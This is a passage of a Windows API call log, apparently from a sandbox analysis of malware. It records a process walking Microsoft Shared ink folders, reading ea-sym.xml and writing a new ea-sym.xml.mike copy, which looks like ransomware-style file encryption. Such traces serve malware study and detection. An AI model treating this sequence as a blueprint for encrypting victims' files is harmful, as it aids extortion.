[0046.240] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe5c2aa20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5c2aa20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.240] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe5c2aa20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5c2aa20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.240] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe263df, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe263df, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe263df, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x39c, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskpredbase.xml", cAlternateFileName="")) returned 1 [0046.240] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe263df, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe263df, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe263df, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x39c, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskpredbase.xml", cAlternateFileName="")) returned 0 [0046.240] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0046.241] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\.", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols", lpFilePart=0x0) returned 0x48 [0046.241] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.241] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.241] CoTaskMemFree (pv=0x4fe370) [0046.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.241] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols", lpFilePart=0x0) returned 0x48 [0046.241] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0046.241] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols", lpFilePart=0x0) returned 0x48 [0046.241] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\", lpFilePart=0x0) returned 0x49 [0046.241] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.241] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.242] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dc0758, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1dc0758, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x900155a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="ea-sym.xml", cAlternateFileName="")) returned 1 [0046.242] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d9a5fb, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d9a5fb, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x900155a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-jp-sym.xml", cAlternateFileName="")) returned 1 [0046.242] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9003b703, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9003b703, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xacc, dwReserved0=0x0, dwReserved1=0x0, cFileName="symbase.xml", cAlternateFileName="")) returned 1 [0046.242] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.242] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0046.242] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", lpFilePart=0x0) returned 0x53 [0046.242] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", lpFilePart=0x0) returned 0x53 [0046.242] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", lpFilePart=0x0) returned 0x53 [0046.242] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0046.242] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0046.244] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", lpFilePart=0x0) returned 0x53 [0046.244] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0046.244] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.244] GetFileType (hFile=0x264) returned 0x1 [0046.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0046.244] GetFileType (hFile=0x264) returned 0x1 [0046.244] CloseHandle (hObject=0x264) returned 1 [0046.244] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", lpFilePart=0x0) returned 0x53 [0046.244] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", lpFilePart=0x0) returned 0x53 [0046.244] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0046.244] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0046.244] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0046.245] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.245] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.245] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), fInfoLevelId=0x0, lpFileInformation=0x22bb414 | out: lpFileInformation=0x22bb414*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dc0758, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1dc0758, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x900155a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ed)) returned 1 [0046.245] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.245] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", lpFilePart=0x0) returned 0x53 [0046.245] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.245] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), fInfoLevelId=0x0, lpFileInformation=0x22bb75c | out: lpFileInformation=0x22bb75c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dc0758, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1dc0758, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x900155a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ed)) returned 1 [0046.245] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.245] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", lpFilePart=0x0) returned 0x53 [0046.245] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike", lpFilePart=0x0) returned 0x58 [0046.245] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0046.245] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.245] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0046.245] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", lpFilePart=0x0) returned 0x53 [0046.245] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", lpFilePart=0x0) returned 0x53 [0046.246] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", lpFilePart=0x0) returned 0x53 [0046.246] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike", lpFilePart=0x0) returned 0x58 [0046.246] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0046.246] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.246] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0046.246] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike", lpFilePart=0x0) returned 0x58 [0046.246] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.246] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.246] GetFileType (hFile=0x264) returned 0x1 [0046.246] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.246] GetFileType (hFile=0x264) returned 0x1 [0046.246] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0046.246] WriteFile (in: hFile=0x264, lpBuffer=0x22bc718*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x22bc718*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0046.247] CloseHandle (hObject=0x264) returned 1 [0046.247] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0046.248] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), fInfoLevelId=0x0, lpFileInformation=0x22bc1d8 | out: lpFileInformation=0x22bc1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dc0758, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1dc0758, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x900155a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ed)) returned 1 [0046.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0046.248] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", lpFilePart=0x0) returned 0x53 [0046.248] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0046.248] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.248] GetFileType (hFile=0x264) returned 0x1 [0046.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0046.248] GetFileType (hFile=0x264) returned 0x1 [0046.248] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0046.248] ReadFile (in: hFile=0x264, lpBuffer=0x22bd858, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x22bd858*, lpNumberOfBytesRead=0x2af038*=0x2ed, lpOverlapped=0x0) returned 1 [0046.249] CloseHandle (hObject=0x264) returned 1 [0046.250] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike", lpFilePart=0x0) returned 0x58 [0046.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.250] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.250] GetFileType (hFile=0x264) returned 0x1 [0046.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.250] GetFileType (hFile=0x264) returned 0x1 [0046.250] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0046.250] WriteFile (in: hFile=0x264, lpBuffer=0x22c18a0*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x22c18a0*, lpNumberOfBytesWritten=0x2af02c*=0x2f0, lpOverlapped=0x0) returned 1 [0046.250] CloseHandle (hObject=0x264) returned 1 [0046.251] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0046.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.251] GetFileType (hFile=0x264) returned 0x1 [0046.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0046.251] GetFileType (hFile=0x264) returned 0x1 [0046.252] WriteFile (in: hFile=0x264, lpBuffer=0x22c4ae0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x22c4ae0*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0046.252] CloseHandle (hObject=0x264) returned 1 [0046.253] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0046.253] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5c50b80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5c50b80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5c50b80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x510)) returned 1 [0046.253] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0046.253] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.253] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22c631c | out: lpFileInformation=0x22c631c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5c50b80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5c50b80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5c50b80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x510)) returned 1 [0046.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.254] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", dwFileAttributes=0x80) returned 0 [0046.255] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", lpFilePart=0x0) returned 0x53 [0046.255] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: 